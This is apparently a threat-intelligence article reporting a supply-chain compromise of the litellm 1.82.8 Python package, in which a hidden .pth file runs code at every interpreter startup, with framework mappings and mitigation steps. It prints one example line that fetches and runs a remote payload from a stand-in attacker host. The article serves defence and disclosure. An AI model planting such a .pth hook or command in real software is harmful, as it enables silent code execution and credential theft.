LIVE THREATS
HIGH Python Supply-Chain Compromise // HIGH Over 1,000 Exposed ComfyUI Instances Targeted in Cryptomining Botnet Campaign // HIGH Google's Vertex AI Is Over-Privileged. That's a Problem // CRITICAL Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances … // CRITICAL How We Broke Top AI Agent Benchmarks: And What Comes Next // LOW Anthropic Claude Mythos Preview: The More Capable AI Becomes, the More Security It Needs // CRITICAL US summons bank bosses over cyber risks from Anthropic's latest AI model // HIGH Can Anthropic Keep Its Exploit-Writing AI Out of the Wrong Hands? // HIGH Browser Extensions Are the New AI Consumption Channel That No One Is Talking About // HIGH Process Manager for Autonomous AI Agents //
ATLAS OWASP HIGH Supply Chain LLM Security Industry News RELEVANCE ▲ 8.2

Python Supply-Chain Compromise

A malicious supply chain attack was discovered in litellm version 1.82.8, a widely-used Python library that serves as a unified interface for interacting with large language model APIs. The compromised package contained a hidden .pth file executing arbitrary code on every Python interpreter startup, meaning any developer or AI system relying on litellm could be silently compromised without triggering an explicit import. Given litellm's central role in LLM-powered application stacks, this attack vector poses significant risk to AI pipeline integrity, credential theft, and downstream model infrastructure.

SOURCE Schneier on Security ↗
$ ./scan --target ai-model --mode deep[*] Initialising threat classifier v2.4.1[*] Loading MITRE ATLAS ruleset ... OK[!] Anomaly detected — confidence 0.94[*] Cross-referencing OWASP LLM Top 10 ...[*] Mapping attack vectors ...[+] SUPPLY CHAIN — category match CONFIRMEDGRID THE GREY // THREAT INTEL // SESSION 1050TTYSUPPLY CHAINPython Supply-Chain CompromiseHIGHSCHNEIER ON SECURITY8.2GRID THE GREY

Overview

A confirmed supply chain compromise has been identified in litellm version 1.82.8, published to the Python Package Index (PyPI). Litellm is a widely adopted open-source library that provides a unified interface for calling APIs across dozens of large language model providers including OpenAI, Anthropic, Cohere, and others. Its prevalence in LLM-powered applications, AI agents, and developer tooling makes this compromise particularly significant. The malicious payload was embedded in a .pth file that Python automatically executes at interpreter startup — requiring no explicit import of the library by the victim.

Technical Analysis

The attack vector exploits a largely underappreciated Python behaviour: .pth files placed in site-packages directories are processed by the Python interpreter on every startup via the site module. The malicious file, litellm_init.pth (34,628 bytes), was bundled inside the wheel distribution and would execute its payload silently regardless of whether the developer ever called import litellm.

# Example of how a malicious .pth file can execute arbitrary code
import os; os.system('curl -s http://attacker.example/payload | python3')

This technique allows an attacker to achieve persistent code execution across any Python environment where the package is installed — including CI/CD pipelines, developer workstations, and production inference servers. The size of the payload (34 KB) suggests non-trivial malicious functionality, potentially including credential harvesting, reverse shells, or API key exfiltration targeting LLM provider credentials stored in environment variables.

Framework Mapping

MITRE ATLAS:

  • AML.T0010 – ML Supply Chain Compromise: The core technique. An adversary tampered with a published ML-adjacent software package to introduce malicious code.
  • AML.T0018 – Backdoor ML Model: While not directly targeting model weights, the compromise of litellm could facilitate persistent access to LLM inference pipelines.
  • AML.T0047 – ML-Enabled Product or Service: Litellm underpins a wide range of LLM-enabled products, amplifying the blast radius of this attack.

OWASP LLM Top 10:

  • LLM05 – Supply Chain Vulnerabilities: A textbook example of third-party package compromise affecting the LLM application ecosystem.
  • LLM06 – Sensitive Information Disclosure: LLM API keys, model configurations, and inference data are at risk of exfiltration through the injected payload.

Impact Assessment

Any organisation or developer who installed litellm==1.82.8 is potentially compromised. The affected population includes AI startups, enterprise LLM application teams, and open-source project maintainers. Environments storing LLM provider API keys (OpenAI, Anthropic, etc.) in environment variables are at elevated risk of credential theft. CI/CD pipelines that install packages from PyPI without hash pinning or integrity verification are also exposed.

Mitigation & Recommendations

  1. Audit installations: Check all environments for litellm==1.82.8 and remove immediately. Upgrade to a verified clean version.
  2. Rotate API keys: Any LLM provider credentials present in affected environments should be considered compromised and rotated without delay.
  3. Implement SBOM tracking: Maintain a Software Bill of Materials for all Python dependencies to accelerate detection of future compromises.
  4. Adopt SLSA and Sigstore: Enforce provenance verification on PyPI packages using Sigstore signatures and SLSA attestations where available.
  5. Pin dependencies with hash verification: Use pip install --require-hashes or tools like pip-audit and pipenv with lock files to detect integrity violations.
  6. Scan for .pth files: Audit site-packages directories for unexpected .pth files as a post-incident detection measure.

References